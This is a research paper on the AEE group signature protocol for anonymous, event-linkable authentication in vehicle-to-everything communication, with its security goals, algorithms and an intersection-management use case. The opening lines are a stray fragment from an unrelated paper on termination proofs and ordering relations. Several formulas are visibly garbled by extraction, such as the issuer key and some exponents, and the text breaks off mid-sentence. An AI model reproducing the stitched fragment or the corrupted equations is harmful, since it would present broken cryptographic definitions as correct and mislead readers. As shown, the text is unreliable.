\[\mathsf{D}_{\mathcal{A}}((1,0,0),(\omega,0,0))=(\omega,0,0) \mathsf{D}_{\mathcal{A}}((0,0,1),(\omega,0,0))=(\omega,0,1)\] with \((\omega,0,0)<(\omega,0,1)\). Hence the termination proof in last year's WST paper is wrong. The problem is that the lexicographic product of weakly monotone orders is in general not weakly monotone ([8, Example 26]). Note that the second and third components were introduced to orient rules \(6\,\mbox{--}\,9\). In the new proof \(\mathrm{AC}\)-MPO orients the rules by taking the precedence \(\mathsf{D}>\mathsf{C}>\mathsf{i}>\mathsf{E}>|\).
2307.13759
A Novel Computationally Efficient Group Signature for Anonymous and Secure V2X Communications
The use of vehicle-to-everything (V2X) communication is expected to significantly improve road safety and traffic management. We present an efficient protocol, called the AEE protocol, for protecting data authenticity and user privacy in V2X applications. Our protocol provides event-based likability, which enables messages from a subject vehicle to be linked to a specific event in order to prevent Sybil attacks. Messages on different events are unlinkable to preserve the long-term privacy of vehicles. Moreover, our protocol introduces a new method for generating temporary public keys to reduce computing and transmission overheads. Such a temporary public key is bound with a certain event and is automatically revoked when the event is over. We describe how to apply our protocol in vehicular communications using two exemplar use cases. To further reduce the real-time computational complexity, our protocol enables us to decompose the cryptographic operations into offline processes for complex operations and real-time processes for fast computations.
Jia Liu, Liqun Chen, Mehrdad Dianati, Carsten Maple, Yan Yan
2023-07-25T18:36:04Z
http://arxiv.org/abs/2307.13759v1
# A Novel Computationally Efficient Group Signature for Anonymous and Secure V2X Communications ###### Abstract The use of vehicle-to-everything (V2X) communication is expected to significantly improve road safety and traffic management. We propose a novel efficient protocol, called AEE protocol, for protecting data authenticity and user privacy in V2X applications. Our protocol provides event-based likability, which enables messages from a subject vehicle to be linked to a specific event in order to prevent Sybil attacks. Messages on different events are unlinkable to preserve the long-term privacy of vehicles. Moreover, our protocol introduces a new method for generating temporary public keys to reduce computing and communication overheads. Such a temporary public key is bound with a certain event and is automatically revoked when the event is over. We describe how to apply our protocol in vehicular communications using two exemplar use cases. To further reduce the real-time computational complexity, our protocol enables us to decompose the cryptographic operations into offline processes for complex operations and real-time processes for fast computations. ## I Introduction Future vehicles are envisaged to use V2X (vehicle to everything) communications for a variety of safety, driving efficiency and infotainment applications. For example, vehicles use V2X communication technology to periodically (e.g., every 0.1s [4]) communicate their status information, such as position, speed, heading and acceleration, to surrounding vehicles and infrastructures. Vehicles can also be informed of crucial traffic information such as accidents, ice, fog, and rain. Vehicle awareness of its environment is increasingly considered to improve collision avoidance and reduce fatalities and injury severity. In this work, we shall consider how to secure two representative safety applications that rely on V2X communications: intersection management and cooperative awareness messages. Intersection management uses the communication between an intersection controller and the nearby vehicles to coordinate vehicles to cross the intersection safely. Cooperative awareness messages are broadcast periodically from each vehicle to inform other vehicles about their presence and status. Securing V2X communication is an indispensable prerequisite for acceptance of the applications enabled by such technologies. Harmful information from a malicious node can jeopardize the safety of target vehicles and endanger others in the vicinity. Therefore, on the one hand, it is a basic requirement to guarantee that information comes from a trusted source and has not been tampered with during transmission. Also, there is a need for tracking malicious nodes and behaviours. On the other hand, protecting vehicle privacy is also of great importance since communications in vehicular networks can be easily abused for vehicle tracking and compromising the privacy of the users. For example, the locations visited by a vehicle enable inference and profiling of the personal interests of its user. To this end, achieving security and privacy requirements at the same time is a challenging objective. A feasible balance between security and privacy in vehicular networks is the short-term linkability originally proposed in [25]. Short-term linkability allows tracking of the movement of a vehicle in a short period of time in order to thwart Sybil attacks (i.e., one vehicle claims to be multiple vehicles) as early as possible while preserving long-term privacy. This is a crucial property for many applications in vehicular networks, such as live traffic map generation, intersection management, and cooperative position. For example, a malicious vehicle may impersonate multiple vehicles and fake traffic congestion to deceive other vehicles to divert the traffic. Beyond the security features, in practice, computational efficiency is a big obstacle for deploying any security mechanism into vehicular networks. The exchange of vital information for safety-related V2X applications is very delay sensitive. In high-speed cooperative driving scenarios, the communication overhead of each packet and the computation latency at each vehicle must be very low to ensure the information exchange is effective. For example, the data processing time for a safety message should be less than 50ms according to the European standard [4]. To simultaneously achieve these seemingly contradicting requirements without compromising the functionality of V2X applications remain a challenge. **Our contributions.** This paper proposes the AEE protocol, an efficient, secure and privacy-enhancing protocol for V2X applications. Our protocol provides event-based linkability to prevent Sybil attacks. An event is uniquely identified using, for example, a timestamp, a location name, a random number, or an incident summary, depending on the use case. The proposed protocol first generates a modified group signature to include an event-linking token which is a unique token on each event for each user. Therefore, multiple signatures produced by the same user can be linked together on the basis of the event. However, messages signed by the same entity on different events are unlikable, which ensures the user's long-term privacy. This modified group signature scheme has its independent interests. To reduce computing and transmission overheads introduced in group signatures, we re-use the event-linking token as a self-certified temporary public key for generating simple and efficient traditional signatures called _event signatures_ to authenticate the subsequent messages. The group signature acts as a certificate for the temporary public key. Since each user can only create one temporary public key for each event, when the event is over, the temporary public key is automatically revoked. To ensure the desired level of privacy, the event has to be updated in an appropriate time frame. To demonstrate the applicability of the proposed scheme, we illustrate how to apply our scheme to V2X communications by considering two use cases: intersection management [12, 14] and cooperative awareness messages [4]. When future events are predictable, we devise an offline computing mechanism to generate the time-consuming group signatures in advance, which significantly reduces the computational delay of the cryptographic operations. Security properties of our scheme are formalised as anonymity, traceability, event linkability and unforgeability in a model for dynamic group signatures. We prove these properties using the random oracle model. **Outline.** The rest of this paper is organised as follows: Section II describes and summarises the existing related work. Section III describes the cryptographic preliminaries and computational assumptions. Section IV presents the model and security goals for our protocol. Section V presents the construction of our protocol. Section VI illustrates how to use our scheme to secure applications in V2X communications. Section VII evaluates performance of our protocol. Section VIII analyses security properties for our protocol. The paper concludes in Section IX. ## II Related work. There is a large body of literature on anonymous authentication schemes. Here we will focus on the research that is tailored to the vehicular networks. Short group signature scheme was originally proposed in [7] to provide anonymous authentications for each message broadcast in vehicular networks. Group signatures achieve authenticity, data integrity, anonymity, and accountability, while getting rid of the heavy overhead for handling numerous public key certificates in the PKI-based pseudonym schemes, e.g., [18, 16]. A group signature scheme enables members of a group to sign messages on behalf of the group. Signatures are verified using a single group public key, and thus they do not reveal the identity of the signer. However, it is not effective to directly apply a group signature scheme to applications in vehicular networks. This is because most of the group signature schemes, e.g., [7, 8, 10, 27, 11, 17, 20, 24], are based on cryptographic paring operations which are known to be computationally expensive. This makes group signatures unsuitable for direct and frequent authentication in delay-sensitive safety applications in V2X communications. Several papers [9, 22, 21, 25] propose hybrid solutions that generate a new temporary public/secret key pair and authenticate them with a group signature and then sign messages with a traditional digital signature scheme using the temporary private key. However, the aforementioned approaches suffer from several shortcomings. First, negotiating, creating and transmitting new temporary keys introduces extra overhead. It is also a non-trivial work if a verifier requires proof of the ownership of the temporary private key. Second, short-term linkability is not securely achieved. In the existing work [9, 22, 21, 25], short-term linkability is achieved by fixing the randoms used in group signatures or the temporary public key where a malicious user does not have to follow through and can break the linkability. Threshold authentication is proposed in [13, 11, 24, 27] for VANET communications where a message is viewed as trustworthy only after it has been endorsed by a certain number of vehicles. Since all the vehicles have to sign exactly the same message to increase the trustworthiness of the message, this method has several limitations. First of all, a safety message needs to be associated with a timestamp to ensure its effectiveness, but the timestamp may vary from vehicle to vehicle, and the messages from different vehicles cannot be exactly the same. Secondly, the threshold method does not apply to the use cases considered in our paper where a vehicle measures and signs its own kinematic information, which cannot be endorsed by any other vehicles. A time-dependent linking system [17] is proposed for vehicle-to-infrastructure communications where a token-generation unit broadcasts a time-token periodically. In comparison, the event in our scheme can be flexibly chosen and customised according to the regions and the real-time traffic conditions. Our scheme enables us to design an offline computation mechanism for the generation of group signatures when the future event is predictable or deterministic. Moreover, the linking token in [17] cannot be reused as a temporary public key, as our scheme can do. Moreover, the schemes in [11, 17, 27] do not support efficient opening, and the computational time for tracing a malicious vehicle is linear in the total number of vehicles. We stress that an efficient opening mechanism is indispensable for ensuring the accountability of vehicles and punishing malicious behaviours. The notion of linkability is not formalised in [24, 27]. A notion of linking soundness is defined in [17], but linking soundness only ensures that the attacker cannot forge a link among messages that are not expected to be linked, and this property can be satisfied by an arbitrary group signature scheme. A crucial aspect of linkability for preventing Sybil attacks is that the users cannot bypass the linkability of the messages that are supposed to be linked. We propose a framework which formalises anonymity, traceability, event linkability and unforgeability. The scheme in [24] is very time-consuming, and the security proofs are based on unusual assumptions. ## III Preliminaries Our protocol makes use of cryptographic bilinear maps. In this section, we review the definitions of cryptographic bilinear maps and describe the computational assumptions for the security of our scheme. _Bilinear Maps._ Let \(\mathbb{G}_{1},\mathbb{G}_{2}\) and \(\mathbb{G}_{T}\) be multiplicative groups of prime order \(p\). A function \(\hat{\mathfrak{e}}:\mathbb{G}_{1}\times\mathbb{G}_{2}\rightarrow\mathbb{G}_{T}\) is a bilinear map if it satisfies the following three properties: 1. Bilinear: \(\hat{\mathfrak{e}}(g^{a},h^{b})=\hat{\mathfrak{e}}(g,h)^{ab}\) for all \(g\in\mathbb{G}_{1},h\in\mathbb{G}_{2}\) and \(a,b\in\mathbb{Z}_{p}^{*}\). 2. Non-degenerate: there exists \(g\in\mathbb{G}_{1},h\in\mathbb{G}_{2}\) such that \(\hat{\mathfrak{e}}(g,h)\neq 1\). 3. Computable: there exists an efficient algorithm to compute \(\hat{\mathfrak{e}}(g,h)\) for all \(g\in\mathbb{G}_{1},h\in\mathbb{G}_{2}\). **Definition 1** (Discrete Logarithm (DL) assumption): _The DL assumption holds if, for all PPT adversaries \(\mathcal{A}\),_ \[\mathsf{Adv}_{\mathcal{A}}^{\text{DL}}(1^{\lambda})=\mathsf{Pr}\big{[} \mathcal{A}(\mathbb{G},q,g,g^{x})=x:x\leftarrow\mathbb{Z}_{p}^{*}\big{]}\] _is negligible in \(\lambda\)._ **Definition 2** (Decision Diffie-Hellman (DDH) assumption): _DDH assumption holds if for all PPT adversaries \(\mathcal{A}\),_ \[\mathsf{Adv}_{\mathcal{A}}^{\text{DDH}}(1^{\lambda})=\] \[\left|\begin{array}{c}\mathsf{Pr}\big{[}\mathcal{A}(\mathbb{G},q,g,g^{a},g^{b},g^{ab})=1\big{]}-\\ \mathsf{Pr}\big{[}\mathcal{A}(\mathbb{G},q,g,g^{a},g^{b},g^{c})=1\big{]}:a,b, c\leftarrow\mathbb{Z}_{p}^{*}\Bigg{|}\end{array}\right.\] _is negligible in \(\lambda\)._ **Definition 3** (External Diffie-Hellman (XDH) Assumption): _Given groups \(\mathbb{G}_{1},\mathbb{G}_{2},\mathbb{G}_{T}\) associated with a bilinear pairing \(\hat{\mathfrak{e}}:\mathbb{G}_{1}\times\mathbb{G}_{2}\rightarrow\mathbb{G}_{T}\). The XDH assumption holds if the DDH problem is hard in \(\mathbb{G}_{1}\) but easy in \(\mathbb{G}_{2}\)._ **Definition 4** (\(q\)-SDH Assumption): _The \(q\)-Strong Diffie-Hellman (SDH) assumption is: given two multiplicative groups \(\mathbb{G}_{1}\) and \(\mathbb{G}_{2}\) of prime order \(p\) with generators \(g_{1}\) for \(\mathbb{G}_{1}\) and \(g_{2}\) for \(\mathbb{G}_{2}\). For any PPT adversary \(\mathcal{A}\), the advantage_ \[\mathsf{Adv}_{\mathcal{A}}^{\text{q-SDH}}(1^{\lambda})=\mathsf{Pr}[\mathcal{ A}(g_{1},g_{1}^{\gamma},\cdots,g_{1}^{\gamma^{\prime}},g_{2},g_{2}^{\gamma})=(g_{1}^{ \frac{1}{\gamma^{\prime+}}},x)]\] _is negligible in \(\lambda\)._ ## IV Models and security goals In this section, we describe the system model, clarify the security assumptions and specify the security and privacy requirements. ### _System model_ Entities involved in our model are: * On-board Unit (OBU): this represents the hardware and software component that is part of a vehicle, such as GPS receiver and kinematic sensors. An OBU has wireless interfaces such as DSRC, Bluetooth or LTE, through which the OBU can broadcast its status information and surrounding traffic information to its nearby OBUs. * Issuer: this is an authority that authorises which OBU can join the group to become a legitimate member. The issuer creates membership credentials for legitimate OBUs, which can be used to anonymously sign all the outgoing messages from these OBUs. In the context of the vehicular network, the issuer could be a transport authority, such as Driver & Vehicle Licensing Agency (DVLA) in the United Kingdom. * Opener: this is an authority that can revoke the anonymity of a misbehaved OBU by opening its signatures. An opener could be a law enforcement agency or a judge. * Roadside Unit (RSU): RSU is installed with hardware and software components, such as an intersection scheduling algorithm. RSU is distributed along the roadside, typically at the intersection area. RSU manages the OBUs that come within their wireless communication range and connects to the backbone networks. ### _Security assumptions_ We assume that OBUs are untrustworthy but tamper-evident describes the ability to detect and keep indisputable evidence when an adversary attempts to modify or break the hardware and software components. This is a common assumption (e.g., [11, 26]) and can be achieved using hardware and software security mechanisms such as the Trusted Platform Module (TPM) for automotive [3]. Each OBU is assumed to be equipped with a tamper-evident black box which provides secure storage for cryptographic keys and performs cryptographic operations, e.g., generating public/secret keys and creating and verifying a signature. The black box is also pre-loaded with public information, such as system parameters and authorities' public keys. This information can later be updated in a trustworthy manner using signed updates. An OBU registers with the issuer and obtains an anonymous credential which will be securely stored in the black box. Further discussions on the V2X applications can be found in Section VI. The assumptions on the capabilities of an adversary can vary for different security properties. Certain security properties, such as unforgeability, can be preserved even when an adversary learns the secret keys of authorities. The formal definitions of an adversary's capabilities for each security goal are presented in Figure 2 in the appendix. Roughly speaking, we consider the common threat model where an adversary can eavesdrop the wireless communication to collect, inject and modify messages. An adversary may possess some legitimate OBUs, break the devices to retrieve the stored cryptographic keys or modify the cryptographic algorithms. However, we assume the adversary cannot break the underlying cryptographic assumptions given in the following Section III. ### _Correctness and security goals_ The correctness and security properties of our AEE protocol are described below. Their formal definitions are defined using experiments involving an adversary and a challenger and can be found in Figure 2 in the appendix. CorrectnessThe correctness guarantees that 1) signatures produced by honest OBUs are accepted by the verification algorithms; 2) the honest opener can identify the signer of such signatures; 3) multiples signatures signed by the same honest OBU for the same event can be correctly linked. AnonymityThis requires that signatures do not reveal any information about the identity of the OBUs who produced them. Signatures produced by one signer but on different events should be unlinkable. TraceabilityThis ensures that the adversary cannot produce a signature that cannot be traced to a legitimate OBU. A designated trusted authority can revoke the anonymity of the message signer when there is a dispute. It aims to identify and punish malicious OBUs in case of liability investigation. Event linkabilityThis links signature involved in the same event signed by the same OBU, while signatures signed by the different OBUs or on different events cannot be linked. This implies that an OBU cannot produce unlinkable signatures for the same event. Event linkability prevents Sybil attacks in an early stage, compared to traceability. An OBU with a valid credential is not able to produce multiple messages on the same event that appear to be from different OBUs. UnforgeabilityThis ensures that a valid signature, including group signature and event signature, cannot be attributed to an honest member unless this member does produce it. It also guarantees that the link among multiple messages cannot be forged. Hence unforgeability of our \(\mathcal{ALE}\) scheme consists of three parts: * _Non-frameability of the group signature_ states that the adversary is unable to frame an honest OBU for producing a certain valid signature unless this OBU really did produce this signature. * _Unforgeability of the event signature_ states that the adversary is unable to forge an event signature that is related to a valid group signature produced by an honest OBU unless this OBU really did produce this signature. * _Unforgeability of the event linkability_ states that the adversary is unable to produce multiple signatures traced to the same signer on the same event, which is unlinkable, and also unable to forge the linkability with signatures signed by different OBUs. The adversary defined for unforgeability is much stronger since it may fully corrupt both the opener and the issuer. ## V Construction In this section, we present the detailed construction of our AEE protocol. The AEE protocol includes \(\mathsf{GSet}\), \(\mathsf{UKg}\), \(\mathsf{GSign}\), \(\mathsf{GVer}\), \(\mathsf{ESign}\), \(\mathsf{EVer}\), \(\mathsf{Link}\), \(\mathsf{Open}\) and \(\mathsf{Judge}\) algorithms, and the \((\mathsf{Join},\mathsf{Issue})\) protocol. The \(\mathsf{GSet}\) algorithms initiate system parameters, and \(\mathsf{UKg}\) creates a long-term public/private key pair for each OBU. There are two types of signatures involved in our construction: _group signatures_ and _event signatures_. The group signatures are created by the \(\mathsf{GSign}\) algorithm and verified by the \(\mathsf{GVer}\) algorithm, while event signatures are created by the \(\mathsf{ESign}\) algorithm and verified by the \(\mathsf{EVer}\) algorithm. A group signature is an anonymous signature which contains an event-linking token to allow the \(\mathsf{Link}\) algorithm to link signers. Two group signatures on the same event from the same signer contain the same event-linking token. This token is later re-used as a temporal public key, called _event public key_, for generating event signatures using traditional digital signatures, which do not involve the time-consuming pairing operations. The group signature serves as an anonymous but event-linkable certificate for the event public key. When the event is over, the event public key is automatically revoked. The \(\mathsf{Open}\) algorithm enables the opener to trace a group signature to a signer and create a tracing proof to attest to the fact. This is for identifying and punishing a misbehaved OBU. The validity of the tracing proof can be checked by the \(\mathsf{Judge}\) algorithm. Our protocol is constructed using group signatures in [7] for anonymous authentication, linking token technique of Direct Anonymous Attestation [8] for achieving event-linkability, and Schnorr signatures [23] for constructing event signatures. Our scheme can be viewed as a hybrid scheme which combines the flexibility and convenience of a group signature with the efficiency of a traditional digital signature, which, besides stronger security and privacy and higher performance, can achieve better revocation than either of these two types of signatures alone. Since we re-use the event-linking token as a public key in event signatures, the security of the combined schemes becomes non-trivial. In fact, modelling and proving the security properties of such a protocol is challenging. Let \(\left(\mathbb{G}_{1},\mathbb{G}_{2},\mathbb{G}_{T}\right)\) be a bilinear group with prime order \(p\) and \(\hat{\mathfrak{e}}:\mathbb{G}_{1}\times\mathbb{G}_{2}\rightarrow\mathbb{G}_{T}\) is an efficient nondegenerate bilinear map. The protocol employs two cryptographic hash functions \(\mathcal{H}_{1}:\left\{0,1\right\}^{*}\rightarrow\mathbb{G}_{1}\) and \(\mathcal{H}_{2}:\left\{0,1\right\}^{*}\rightarrow\mathbb{Z}_{p}\). ### _Initialisation_ The algorithm \(\mathsf{GSet}(1^{\lambda})\) generates master secret keys for the issuer and the opener and group public parameters. The algorithm \(\mathsf{UKg}(1^{\lambda})\) produces a private/public key pair to be used as a long-term identity for an OBU. The algorithms proceed as follows. \(\mathsf{GSet}(1^{\lambda})\): * The issuer chooses \(\gamma\leftarrow\mathbb{Z}_{p}^{*}\), \(g_{1}\leftarrow\mathbb{G}_{1}\backslash\{1_{\mathbb{G}_{1}}\}\), \(g_{2}\leftarrow\mathbb{G}_{2}\backslash\{1_{\mathbb{G}_{2}}\}\), and computes \(w=g_{2}^{*}\). The issuer's master issuing key is \(\mathsf{mix}=\gamma\), which will be used to issue membership credentials for legitimate OBUs. * The opener chooses \(u\leftarrow\mathbb{G}_{1}\backslash\{1_{\mathbb{G}_{1}}\}\), \(\xi\leftarrow\mathbb{Z}_{p}^{*}\) and computes \(h=u^{\xi}\). The opener's master opening key is \(\mathsf{mok}=\xi\). * The group public key is \(\mathsf{gpk}=(g_{1},h,u,\mathcal{H}_{1},\mathcal{H}_{2},g_{2},w)\). \(\mathsf{UKg}(1^{\lambda})\): An OBU \(i\) chooses \(y\leftarrow\mathbb{Z}_{p}^{*}\) and sets its secret key as \(\mathsf{usk}[i]=y\) and public key as \(\mathsf{upk}[i]=h^{y}\). This key pair is an OBU's personal public key and secret key, which is used to authenticate the OBU when it registers with the issuer. The public key list upk is assumed to be public, and anyone can get an authentic public key of any user. This can be easily implemented using traditional public key infrastructure and certificates. ### _Registration of new members_ An OBU \(i\) can register with the issuer to become a legitimate group member through an interactive protocol \((\mathsf{Join}(\mathsf{gpk},i,\mathsf{upk}[i],\mathsf{usk}[i]),\mathsf{ Issue}(\mathsf{gpk},\mathsf{mix},\mathsf{reg},i,\mathsf{upk}[i]))\). Upon successful completion, the OBU \(i\) becomes a group member and obtains a _group signing key_ as its membership credential. The final state of the Issue algorithm is stored in the registration table at index \(\mathsf{reg}[i]\), whereas that of the Join is stored in \(\mathsf{gsk}[i]\). The communication between the OBU and the issuer is assumed to take place over secure channels, which can be easily established using TLS/SSL. \(\mathsf{Join}(\mathsf{gpk},i,\mathsf{upk}[i],\mathsf{usk}[i])\): Let \(y=\mathsf{usk}[i]\) and \(z=\mathsf{upk}[i]\). * OBU chooses a random \(r\leftarrow\mathbb{Z}_{p}^{*}\) and compute \(c=\mathcal{H}_{2}(h,z,h^{r})\) and \(s=r+cy\). Send \((z,c,s)\) to the issuer. This is to prove OBU's knowledge of its secret key \(y\) and show the ownership of its public key \(z\). * Upon receiving \((x,A)\) from the issuer, OBU checks if \(\hat{\mathsf{e}}(A,g_{z}^{*}w)=\hat{\mathsf{e}}(g_{1}\cdot z^{-1},g_{2})\). If successful, OBU sets \(\mathsf{gsk}[i]=(x,y,A)\) as its group signing key. * \(\mathsf{Issue}(\mathsf{gpk},\mathsf{mix},\mathsf{reg},i,\mathsf{upk}[i])\): Upon receiving \((z,c,s)\) from the OBU, the issuer verifies whether the proof is correct by computing \(\tilde{c}=\mathcal{H}_{2}(h,z,h^{s}z^{-c})\) and checking if \(c=\tilde{c}\). If successful, the issuer chooses \(x\leftarrow\mathbb{Z}_{p}^{*}\) and computes \(A=(g_{1}\cdot z^{-1})^{\frac{1}{s+2}}\). The issuer stores \((x,A)\) in a registration table at index \(\mathsf{reg}[i]=(x,A)\) and send \((x,A)\) to the OBU. ### _Generation of group signatures_ An OBU \(i\) can run an algorithm \(\mathsf{GSign}(\mathsf{gpk},\mathsf{gsk}[i],\mathsf{et},m)\) using its group signing key \(\mathsf{gsk}[i]\) to produce a group signature on a certain event et with message \(m\). This signature proves the knowledge of a valid group signing key in an anonymous way. The signature also certifies an event-linking token \(T\) to be used as a temporary public key in the following event signatures. Thus the message \(m\) can be a "hello" message or can be simply omitted. Assume the OBU's group signing key is \(\mathsf{gsk}[i]=(x,y,A)\). The algorithm proceeds as follows. * Choose \(\alpha\leftarrow\mathbb{Z}_{p}^{*}\) and compute \(D=u^{\alpha},B=Ah^{\alpha},T=\mathcal{H}_{1}(\mathsf{et})^{y}\). \(T\) is called the _event-linking token_. * Choose \(r_{x},r_{y},r_{\alpha},r_{\delta}\leftarrow\mathbb{Z}_{p}^{*}\). Compute \(R_{1},R_{2},R_{3},R_{4}\) as follows: \(R_{1}=u^{r_{\alpha}},R_{2}=\mathcal{H}_{1}(\mathsf{et})^{r_{y}},R_{3}=u^{rs}D^ {r_{x}}\) and \(R_{4}=\hat{\mathsf{e}}(B,g_{2})^{r_{x}}\hat{\mathsf{e}}(h,w)^{r_{\alpha}}\hat{ \mathsf{e}}(h,g_{2})^{r_{y}+r_{\delta}}\). * Compute \(c=\mathcal{H}_{2}(\mathsf{et},m,D,B,T,R_{1},R_{2},R_{3},R_{4})\), \(s_{x}=cx+r_{x},s_{y}=cy+r_{y},s_{\alpha}=-c\alpha+r_{\alpha}\) and \(s_{\delta}=-\alpha cx+r_{\delta}\). * Output a signature \(\sigma=(D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\) as a group signature on the event et and message \(m\). The et can be chosen by an authority, like RSU, and can also be chosen by an individual vehicle, such as the lead vehicle in a platoon or a vehicle launching a certain event such as cooperative positioning [15, 28], or can be chosen by establishing an agreement among a group of vehicles. More discussions on et can be found in Section VI. Each OBU can only generate an unique event-linking token \(T=\mathcal{H}_{1}(\mathsf{et})^{y}\) for an event et. Within the event et, the group signatures from the same user are linkable because they have the same event-linking token. ### _Verification of group signatures_ Any recipient of a group signature \(\sigma\) on an event et and a message \(m\) can run algorithm \(\mathsf{GVer}(\mathsf{gpk},\mathsf{et},m,\sigma)\) to check the validity of the signature. The algorithm proceeds as follows. Parse \(\sigma\) as \((D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\). Compute \(\tilde{R}_{1},\tilde{R}_{2},\tilde{R}_{3},\tilde{R}_{4}\) as follows: \(\tilde{R}_{1}=u^{s_{\alpha}}D^{c},\tilde{R}_{2}=\mathcal{H}_{1}(\mathsf{et})^ {sy}T^{-c},\tilde{R}_{3}=u^{s_{\delta}}D^{s_{\delta}}\) and \[\tilde{R}_{4}=\hat{\mathsf{e}}(B,g_{2})^{s_{x}}\hat{\mathsf{e}}(h,w)^{s_{ \alpha}}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\Big{(}\frac{\hat{ \mathsf{e}}(B,w)}{\hat{\mathsf{e}}(g_{1},g_{2})}\Big{)}^{c}\] Check if \(c=\mathcal{H}_{2}(\mathsf{et},m,D,B,T,\tilde{R}_{1},\tilde{R}_{2},\tilde{R}_{3 },\tilde{R}_{4})\). Output 1 if the check succeeds, else output 0. ### _Generation of event signatures_ After an OBU creates and broadcasts a group signature \(\sigma\) with an event-linking token \(T=\mathcal{H}_{1}(\mathsf{et})^{y}\), the OBU can use \(\mathit{epk}=(\mathcal{H}_{1}(\mathsf{et}),T)\) as an _event public key_ to produce event signatures that can be verified against this temporary public key. The event signatures are generated using algorithm \(\mathsf{ESign}(\mathsf{usk}[i],\mathsf{et},\mathit{epk},m_{e})\), which proceeds as follows. Let \(y=\mathsf{usk}[i]\) be the \(i\)-th OBU's secret key. Choose a random \(r\leftarrow\mathbb{Z}_{p}^{*}\). Compute \(R=\mathcal{H}_{1}(\mathsf{et})^{r}\) and \(c_{e}=\mathcal{H}_{2}(\mathsf{et},m_{e},\mathit{epk},R)\). Output an event signature \(\sigma_{e}=(s_{e},c_{e})\) where \(s_{e}=r+yc_{e}\). The event signatures are the traditional digital signatures which do not involve pairing operations and, for this reason, are much more efficient compared to group signatures. An OBU can use event signatures to, for example, update and sign its status information (e.g., GPS location, speed). Note that the event public key is self-certified in the group signature and is bound with the event et. When the event is over, the event public key is automatically revoked and is no longer valid. ### _Verification of event signatures_ Any recipient of an event signature \(\sigma_{e}\) can run the verification algorithm \(\mathsf{EVer}(\mathsf{et},\mathit{epk},m_{e},\sigma_{e})\) to check the validity of the signature using the corresponding event-linking token. The algorithm proceeds as follows. Parse \(\sigma_{e}=(s_{e},c_{e})\). Compute \(\tilde{R}=\mathcal{H}_{1}(\mathsf{et})^{s_{e}}\mathit{epk}^{-c_{e}}\) and \(\tilde{c}=\mathcal{H}_{2}(\mathsf{et},m_{e},\mathit{epk},R)\). If \(c_{e}=\tilde{c}\), then output 1, else output 0. ### _The event-linking algorithm on group signatures_ Any recipient of two group signatures \(\sigma_{0},\sigma_{1}\) on an event et can run a linking algorithm \(\mathsf{Link}(\mathsf{et},m_{0},\sigma_{0},m_{1},\sigma_{1})\) to check if the two signatures are signed by the same OBU. The algorithm proceeds as follows. Parse \(\sigma_{b}\) as \((D_{b},B_{b},T_{b},c_{b},s_{x,b},s_{y,b},s_{\alpha,b},s_{\delta,b})\) for \(b=0,1\). The algorithm compares the event-linking tokens \(T_{0},T_{1}\): if \(T_{0}=T_{1}\), then output 1 else, output 0. An OBU \(i\) can generate at most one event-linking token for a certain event. This guarantees that all the messages signed by the OBU using group signatures and event signatures on a certain event are linkable by any recipient, which effectively thwarts Sybil attacks as early as possible. However, these group signatures and event signatures do not leak any information about the OBU's long-term identity \(\mathsf{upk}[i]\) to the public, which preserves the OBU's anonymity. ### _Opening group signatures_ The opener can run an opening algorithm \(\mathsf{Open}(\mathsf{gpk},\mathsf{mok},\mathsf{reg},\sigma)\) to recover the identity of the signer of a group signature \(\sigma\) and produce a tracing proof \(\pi\) attesting to this fact. The algorithm proceeds as follows. Parse \(\sigma\) as \((D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\). Computes \(A=BD^{-\xi}\) and finds \(i\) such that \(\mathsf{reg}[i]=(x,A)\) for some \(x\). \(i\) is the identity of the original signer. Then the algorithm produces proof that this signature is indeed produced by \(i\). Choose \(r\leftarrow\mathbb{Z}_{p}^{s}\), compute the proof as \(\pi=(K,s,c,x)\) where \(K=D^{\xi},c=\mathcal{H}_{2}(\sigma,K,u^{r},D^{r}),s=r+\xi c\), and return \((i,\pi)\). ### _Judging tracing proofs_ Any recipient of a group signature \(\sigma\) and a tracing proof \(\pi\) can run a judging algorithm \(\mathsf{Judge}(\mathsf{gpk},i,\mathsf{upk}[i],\sigma,\pi)\) to verify if \(\pi\) is a valid proof that OBU \(i\) produced \(\sigma\). The algorithm proceeds as follows. Parse \(\sigma\) as \((D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\) and \(\pi=(K,s,c,x)\). Let \(z=\mathsf{upk}[i]\). Compute \(\tilde{c}=\mathcal{H}_{2}(\sigma,K,u^{s}h^{-c},D^{s}K^{-c})\). If \(\tilde{c}=c\) and \(\hat{\mathsf{e}}(BK^{-1},wg_{2}^{x})=\hat{\mathsf{e}}(g_{1}z^{-1},g_{2})\) output 1, else output 0. ## VI Applications in vehicular networks In this section, we describe how to apply the proposed AEE protocol to exemplar applications of V2X communications. The discussion here mainly focuses on how to instantiate events in each application which decides the way the vehicle messages are linked. Generally speaking, the realisation of events is flexible and can vary from case to case. The events have to be updated periodically to protect a vehicle's long-term privacy. The more frequently the events are changed, the stronger privacy and weaker linkability. The events can be chosen by an authority, like RSU, and can also be chosen by an individual vehicle, such as the lead vehicle in a platoon or a vehicle launching a certain event such as cooperative positioning [15, 28], or can be chosen by establishing an agreement among a group of vehicles. To demonstrate how the proposed AEE scheme can be used in V2X system applications, we consider two exemplar use cases in vehicular networks: intersection management [14, 12] and cooperative awareness messages [4]. ### _Intersection management_ When an authority RSU is nearby, events can be created by the authority. We consider the intersection management [14, 12] for scheduling connected and autonomous vehicles to cross a traffic intersection safely. These techniques utilise the communication between a central controller and vehicles, while the conventional traffic control methods, such as stop signs and traffic lights, have been removed. An intersection controller is a program that runs on a centralised infrastructure physically located at the intersection. The controller only supervises vehicles located within a certain distance of the intersection. A centralised intersection scheduling algorithm [14, 12] proceeds as follows: 1. When a vehicle approaches an intersection area, the vehicle periodically broadcasts its status information, such as the vehicle's position, heading, desired velocity, the brake or accelerator input, vehicle profile and future path. 2. If the current states of the controlled vehicles lead to an inevitable collision, the controller broadcasts a safe input to override the inputs of the controlled vehicles. Though the main goal of such intersection scheduling algorithms is to avoid collisions, the controller can also consider some mechanisms to optimise the system performance, such as reducing the aggregate fuel consumption. 3. The controller samples the next set of vehicles and repeats the above steps. In this application scenario, events can be generated and updated by the controller. The controller can construct an event as \(\mathsf{et}:=\) "intersection location \(\mathbb{I}\) timestamp" to avoid using the same et at different intersections. This prevents the vehicles from being tracked at different intersections. The controller broadcasts the current et. The authenticity of the et from RSU can be easily achieved using digital signatures and PKI 